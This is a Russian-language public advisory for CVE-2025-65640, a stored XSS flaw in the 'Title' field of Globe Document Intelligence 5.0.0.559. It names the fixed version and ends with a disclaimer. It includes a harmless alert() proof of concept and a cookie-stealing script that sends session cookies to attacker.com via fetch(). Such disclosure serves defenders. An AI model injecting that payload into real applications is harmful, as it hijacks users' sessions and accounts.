
Публичное уведомление о CVE-2025-65640: хранимая XSS-уязвимость в Globe Document Intelligence.
В платформе Globe Document Intelligence (версия 5.0.0.559) выявлена уязвимость типа «межсайтовый скриптинг с сохранением» (Stored Cross-Site Scripting, XSS). Приложение не выполняет надлежащую санитизацию или кодирование пользовательского ввода в свойстве «Title» создаваемого документа. Когда аутентифицированный пользователь переходит на страницы сводки (например, «Task in progress / Recent»), вредоносная полезная нагрузка отражается и выполняется в контексте браузера жертвы.
Данная уязвимость позволяет аутентифицированному злоумышленнику сохранить вредоносный JavaScript-код на сервере. Когда другие аутентифицированные пользователи (включая учётные записи администраторов) просматривают затронутые страницы, скрипт выполняется автоматически. Хотя приведённый ниже Proof of Concept демонстрирует уязвимость с помощью безобидного alert(), злоумышленник может использовать этот недостаток для перехвата сеанса (Session Hijacking) и захвата учётной записи (Account Takeover). Например, внедрение полезной нагрузки вида позволит незаметно похитить сеансовые cookie жертвы на внешний сервер, контролируемый злоумышленником.
<script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script>Чтобы воспроизвести уязвимость, аутентифицированному злоумышленнику необходимо выполнить следующие шаги:
<script>alert("XSS")</script>По информации поставщика, данная уязвимость устранена в версии 5.1.0.575. Для устранения проблемы рекомендуется обновить платформу Globe Document Intelligence до версии 5.1.0.575.
Данный Proof of Concept (PoC) предоставлен исключительно в образовательных и исследовательских целях. Информация и код, описанные в этом документе, не должны использоваться во вредоносных целях или против любых систем без явного предварительного разрешения владельцев систем. Автор не несёт ответственности и не отвечает за неправомерное использование или ущерб, причинённый в результате применения предоставленных материалов.